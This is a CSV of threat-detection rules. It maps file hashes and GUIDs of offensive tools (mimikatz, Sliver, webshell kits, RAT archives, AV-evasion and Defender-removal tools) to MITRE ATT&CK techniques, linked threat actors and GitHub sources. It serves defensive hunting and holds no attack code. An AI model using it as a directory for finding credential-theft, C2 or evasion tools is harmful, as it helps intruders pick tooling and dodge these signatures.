"*b40ecc66931f17246fa3d7571b293d86cdff0581364efb7405c5cb71873fc2a7*",".{0,1000}b40ecc66931f17246fa3d7571b293d86cdff0581364efb7405c5cb71873fc2a7.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","34673"
"*b4136c74ef7fedac0f8f6f8261cad1544902d0c786ea3ef1cfade20c07a5e82a*",".{0,1000}b4136c74ef7fedac0f8f6f8261cad1544902d0c786ea3ef1cfade20c07a5e82a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34675"
"*b41498d3c4883fb374dce5c9923c60b5ac901775909ae74d13a05851b80cc221*",".{0,1000}b41498d3c4883fb374dce5c9923c60b5ac901775909ae74d13a05851b80cc221.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#filehash","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","34676"
"*b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea*",".{0,1000}b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34677"
"*b41554edc90ade1c7ce3553707cec2ce048b372e2ab960033b39dd3c65692261*",".{0,1000}b41554edc90ade1c7ce3553707cec2ce048b372e2ab960033b39dd3c65692261.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","34678"
"*b416c391df9c944901ea74a04d71853eeabb63f41319efedca9506f6bc8f23e3*",".{0,1000}b416c391df9c944901ea74a04d71853eeabb63f41319efedca9506f6bc8f23e3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34679"
"*b4239ef8e8962d393767152c150f17bc5cf0527d6fed52d489b444f46402650a*",".{0,1000}b4239ef8e8962d393767152c150f17bc5cf0527d6fed52d489b444f46402650a.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","34681"
"*b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113*",".{0,1000}b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34682"
"*b42f9571d486a8aef5b36d72c1c8fff83f29cac2f9c61aece3ad70537d49b222*",".{0,1000}b42f9571d486a8aef5b36d72c1c8fff83f29cac2f9c61aece3ad70537d49b222.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","34683"
"*b430b05f0f5557426217c9a5a94f87521264b47398183c8715cd1615a7ed645e*",".{0,1000}b430b05f0f5557426217c9a5a94f87521264b47398183c8715cd1615a7ed645e.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","34684"
"*b43587da7d68a081ddc3a46993f797782e813ed07ccc5f33fe37b14a653ccfed*",".{0,1000}b43587da7d68a081ddc3a46993f797782e813ed07ccc5f33fe37b14a653ccfed.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","34686"
"*b4365f5c1b052eda101ce80a2184f92fd3a0a4d9c48255fdb7042ea7a4810fd6*",".{0,1000}b4365f5c1b052eda101ce80a2184f92fd3a0a4d9c48255fdb7042ea7a4810fd6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34687"
"*b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a*",".{0,1000}b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34689"
"*b453e2257ae08240b0fba5a6828aa119af8bc027e5fcb5600542d5d3c2706ab4*",".{0,1000}b453e2257ae08240b0fba5a6828aa119af8bc027e5fcb5600542d5d3c2706ab4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34690"
"*b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617*",".{0,1000}b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34691"
"*b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52*",".{0,1000}b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#filehash","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","34696"
"*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*",".{0,1000}B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","34697"
"*B474B962-A46B-4D35-86F3-E8BA120C88C0*",".{0,1000}B474B962\-A46B\-4D35\-86F3\-E8BA120C88C0.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#GUIDproject","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","34699"
"*b47a3b1087bfa77566ae4058f2e86abcd27ee42f3fda8d961ae96f871ff3506a*",".{0,1000}b47a3b1087bfa77566ae4058f2e86abcd27ee42f3fda8d961ae96f871ff3506a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34700"
"*b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09*",".{0,1000}b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34702"
"*b47edb3e68c611678e3226fe1a42a296d458b0dd282cc9a1f9e9dbaa313de98d*",".{0,1000}b47edb3e68c611678e3226fe1a42a296d458b0dd282cc9a1f9e9dbaa313de98d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","34703"
"*b4811fd8d4da079398d21dbb0e8b301ef75ff6a31e1ea2d9357c521a019d0c0e*",".{0,1000}b4811fd8d4da079398d21dbb0e8b301ef75ff6a31e1ea2d9357c521a019d0c0e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34706"
"*b49250e1629e9241310ea0b4db1651be12ad0013e605bb1b5c57de826025ae41*",".{0,1000}b49250e1629e9241310ea0b4db1651be12ad0013e605bb1b5c57de826025ae41.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","34708"
"*b494f44756f989b9f693bb1d69b3760a7ddef53a1f61b5754fd93db5449de1cd*",".{0,1000}b494f44756f989b9f693bb1d69b3760a7ddef53a1f61b5754fd93db5449de1cd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34709"
"*b49abe3651b2e07c875f149d9931820ca27237d929814c94b2cfa32f1a445737*",".{0,1000}b49abe3651b2e07c875f149d9931820ca27237d929814c94b2cfa32f1a445737.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34710"
"*b49ec9495cebbc03139dd1e0a5ccc665760e1cc0770fd896077db21abc122b2b*",".{0,1000}b49ec9495cebbc03139dd1e0a5ccc665760e1cc0770fd896077db21abc122b2b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34711"
"*b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b*",".{0,1000}b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","34712"
"*b4a463948663e6a142ddbbc35f9ef543da818497acfdf21c21ec2bd96bc53fa6*",".{0,1000}b4a463948663e6a142ddbbc35f9ef543da818497acfdf21c21ec2bd96bc53fa6.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","34714"
"*b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5*",".{0,1000}b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","34715"
"*b4ac2390829f0e3a76c51692d27759ca7b83b4459c4707e86d59c72dbbbe36d3*",".{0,1000}b4ac2390829f0e3a76c51692d27759ca7b83b4459c4707e86d59c72dbbbe36d3.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34718"
"*b4af4df46eb9a169f197c093325d983db5dc0ab1eb6bd7aa67458e4f48c2e0b2*",".{0,1000}b4af4df46eb9a169f197c093325d983db5dc0ab1eb6bd7aa67458e4f48c2e0b2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","34720"
"*b4bcf5f83ad72c100e50a9590dd23bb35ac70a6331686e6c6a50339d608e671a*",".{0,1000}b4bcf5f83ad72c100e50a9590dd23bb35ac70a6331686e6c6a50339d608e671a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34721"
"*b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896*",".{0,1000}b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34722"
"*b4c1fe4b72f4cfe5ee58e4196e4620eea2a70641a033c25d0cb96758ec672d7f*",".{0,1000}b4c1fe4b72f4cfe5ee58e4196e4620eea2a70641a033c25d0cb96758ec672d7f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34725"
"*b4c70e7499e46ab28c305ce9937933ea2674a16df3686830f6016c9321e23b84*",".{0,1000}b4c70e7499e46ab28c305ce9937933ea2674a16df3686830f6016c9321e23b84.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","34726"
"*b4c75048a8837dbad2a829e17a1370716cc40f9a6fd3b0f50df7f0e3f97564c1*",".{0,1000}b4c75048a8837dbad2a829e17a1370716cc40f9a6fd3b0f50df7f0e3f97564c1.{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027.003 - T1027..009 - T1218 - T1216 - T1059","TA0005","N/A","Sandworm Team","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","#filehash","N/A","7","10","2176","399","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z","34727"
"*b4ce5c82a51a7281bb0d04463c110471ca73f39813ed11c5c51d48d6cf7733e5*",".{0,1000}b4ce5c82a51a7281bb0d04463c110471ca73f39813ed11c5c51d48d6cf7733e5.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","34729"
"*b4d2e7159b1707d9355ac8699897c55441a25afebf66b4f47087b34d5e4994cb*",".{0,1000}b4d2e7159b1707d9355ac8699897c55441a25afebf66b4f47087b34d5e4994cb.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","0","#filehash","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","34730"
"*b4da4ba10fa5cd627400a6b35570527fbecdd499d7aab9beb1ec7a7016664d4f*",".{0,1000}b4da4ba10fa5cd627400a6b35570527fbecdd499d7aab9beb1ec7a7016664d4f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34732"
"*b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803*",".{0,1000}b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34733"
"*b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803*",".{0,1000}b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34734"
"*b4dc2fcd506a9878c5fb8e8b08a47c1e810eb48465a6b489bc4b5003711b0522*",".{0,1000}b4dc2fcd506a9878c5fb8e8b08a47c1e810eb48465a6b489bc4b5003711b0522.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","34735"
"*b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd*",".{0,1000}b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34736"
"*b4ed9c347e748f0fac2c3e75852373c08fdde68ec741c45109e8afd7c3381f0d*",".{0,1000}b4ed9c347e748f0fac2c3e75852373c08fdde68ec741c45109e8afd7c3381f0d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34737"
"*b4ef4d10245cb81ac244e6fb545cc76a5fad1ac79eedbcec69b932765d5f29d8*",".{0,1000}b4ef4d10245cb81ac244e6fb545cc76a5fad1ac79eedbcec69b932765d5f29d8.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","34738"
